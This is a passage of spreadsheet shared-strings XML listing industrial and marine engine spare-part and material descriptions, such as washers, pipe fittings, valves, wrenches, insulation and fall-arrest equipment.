    <t>BUSHING, CLAMPING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE-SELF-LUB NON-METAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC,ROUND-PLAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC,ROUND-CHAMFERED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC WITH OUTSIDE RECESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING PLATE, SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC-EDGED WITH HOLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE-ROUND-MACHINED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE-ANGULAR-MACHINED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TAB WASHER WITH 2 TABS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCK PLATE-CIRCULAR ARC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Washer, self-locking</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spring lock</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOTHED LOCK WASHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD FOR LIFTING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CLAMP. 2 FLAPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAMP-SECTIONAL MATERIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clamp, two parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAGNET-CYLINDRICAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RIVET-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARALLEL KEY-PRESS FIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOOK WITH THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FINAL LINK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOOR FASTENER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rolling bearing w. foot housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING, PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAL. OIL RING F. BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Vibration damping support</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Vibr. damping support, rubber</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT,BASE FOR SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT,PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-CAST IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOSS FOR INSTRUMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for pipe support</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for Lower Gallery</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Support for enclosures</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTING OF COPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTIVATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOLYKOTE G-N PLUS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING SPRING WASHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDRICAL PINS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON FIT BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON SOCKET PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER,CIRCULAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER,CIRCULAR W.RECESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING COVER-ROUND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER, OVAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE IRON RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD-RECTANGULAR-PLANE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLING PIECE, SCRABER RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING RING-RUBBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RING HALF-PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TANK BOX-SHAPED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VESSEL-BOX-SHAPED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Case accessory fitting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOX, STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOX WITH MOUNTING PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONDENSATION CHAMBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING BOX, PLAST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Packing Foil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STANCHION PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IDENTIFICATION CODES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Label sheet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JIS part (Japanese Indust. Std.)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>External No. (no description)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>External No. (unidentified subj)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>External No. (requested at lic.)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BARS(75-100MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spring steel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COPPER PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bronze plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Aluminium plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Aluminium plate, sectional</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Brass plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Brass plate, sectional</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lead plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lead plate, sectional</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAINLESS STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE-ACRYL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTIONAL WOOD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE,RUBBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHEQUER PLATE (4,5MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHEQUER PLATE (5 MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHEQUER PLATE (6 MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHEQUER PLATE (8 MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PERFORATED PLATE-STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXPANDED METAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>METAL SECTIONAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALUMINIUM SECTIONAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Steel pipe, Ext. dia. 0-50</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PIPE (50-(100))OD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PIPE (100-(150))OD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COPPER-NICKEL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALUMINIUM PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTIONAL IRON,ANGLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTIONAL IRON,OTHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRODE-STELLITE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING POWDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRODE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Friction material</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALUBRONZE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insulation, granulate/powder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION-FOIL/CLOTH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insulation, f. pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION-ROLL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insulation-tape</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION, FELT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOUND INSULATION-PVC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TAPE, SELF-ADHESIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE END INSUL. SLEEVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLAIN COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SQUARE FLANGE - BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING, ROUND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING, SQUARE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING, SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SYNTHETIC RUBBER CORD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RED. ADAPTOR, MALE/FEMALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MALE STUD ELBOW COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTABLE ELBOW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BANJO COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGTH MALE STUD FITTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REDUCING FITTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EQUAL ELBOW COUPL.W.RESTR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VENTING PIPE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PNEUMATIC VAVLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUXILIARY CONTACT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSOSTATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEVEL SWITCH RELAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE F. THERMO/PRESSOST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SENSOR POCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAS-MODUL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOW LOAD CONTROL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RC-LINK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>M.O.P. WITH CAMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG CONNECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRIDGE RECTIFIER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DC/DC - CONVERTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRINTCARD RELAY BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PHASE BREAKING RELAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACCESSORIES FOR S-SYTSEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIGHTED PUSHBUTTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TERMINAL BLOCK PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEED RELAY PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RED. ADAPTORS MALE/FEMALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLIND PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ICS CONTROL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blow-Off Nipel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR PRESSURE REGULATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4/3-way Solenoid Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOUBLE NON.RETURN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PILOT VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure releif valve, Manifold</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PNEUMATIC CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEAM TRAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBULAR BOX WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE HANDLED SOCKET WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKET WRENCH, OUTSIDE HEXAGON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKET WRENCH-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>KEY HEXAGON SOCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>KEY HEX. SOCKET, SOCKET W</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIN IMPACT WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOUBLE ENDED RING WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WRENCH WITH SQUARE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPECIAL WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TORQUE WRENCH OFFSET TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTENSION BAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS FOR HEXAGON SPANNER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAW FOR CHAIN ASSEMBLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINER FORK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD SETTER, SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAWING TOOL- CROSSBAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR, CROSSBAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEPPED DRIFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAWING TOOL, VARIOUS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-HYDRAULIC (EXT. NUT)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-HYDRAULIC (INT. NUT)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling for hydraulic jack</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-MECHANICAL(FITTINGS)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydr. Jack -Misc.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test Rig for Lifting Device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Parallel bar, test shop</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fixture for Tension Test Rig</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUSHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SIZER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUCTION LIFTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Support Equipment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.ATTACHM.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM BOARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR LADDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING DEVICE-COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Safety Harness</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Twin Shock-Absorbing Lanyard</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Work Positioning Lanyard</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Back Extension Strap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Safety Hook</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Protective Gloves</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Safety Video Instruction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bag for Fall Arrest Equipm.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Check List,Fall Arrest Equipment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Safety Ring at Cyl.cov.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Safety Pack</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUTTER-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPHERICAL CUTTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TAP WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING MANDREL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING MANDREL, END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING MANDREL, ANGEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING BAND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING WHEEL INSIDE GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING WHEEL IN/OUT GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Grinding wheel, outs.guide,paper</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING MACHINE, SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thread tab, M-BSP-WG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thread tab, pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUNTERSINK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TWIST DRILL-PARALLEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BORING BUSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRILLING MACHINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drill-morse taper</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scraper blade, straight</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scraper blade, curved</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING PIPE-STEAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MICROMETER CALIPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAND F.MICROMETER HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MARKING-OFF PLAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pin gauge, straight</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pin gauge, L-shaped</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pin gauge, U-shaped</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASURING BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRIDGE GAUGE PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST MANDREL, VALVE SEAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHT RAIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spirit level</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blank for adjusting gauge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE,STRAIGHT ROLLED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-ST.,ROLLED,CONICAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PIPE-BENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE, BENT WITH HOLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-STRAIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tube, shrinkable</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE-STEEL, SMOOTH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hose, special profile</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLEX.STEEL PIPE WITH HOSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexible protector spiral</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sleeve for Flex. steel tube</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE,CURVED, WITH THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BEND W THREAD, 90 DG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BEND W THREAD,#90 DG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNION WITH FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REDUCING NIPPLE+SOCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON NIPPLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE PIECE, WITH FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE PIECE, EXT. THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE PIECE,EXT/INT THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH PIECE, EXT. THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE STUB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH P. INT/EXT THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe conical, weld</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe branch, flanged</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe branch, Duplex</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUNNEL,PARTS FOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe couplings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,CIRCULAR PLAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,SAE-FLARE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,MALE THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,TEE</t>
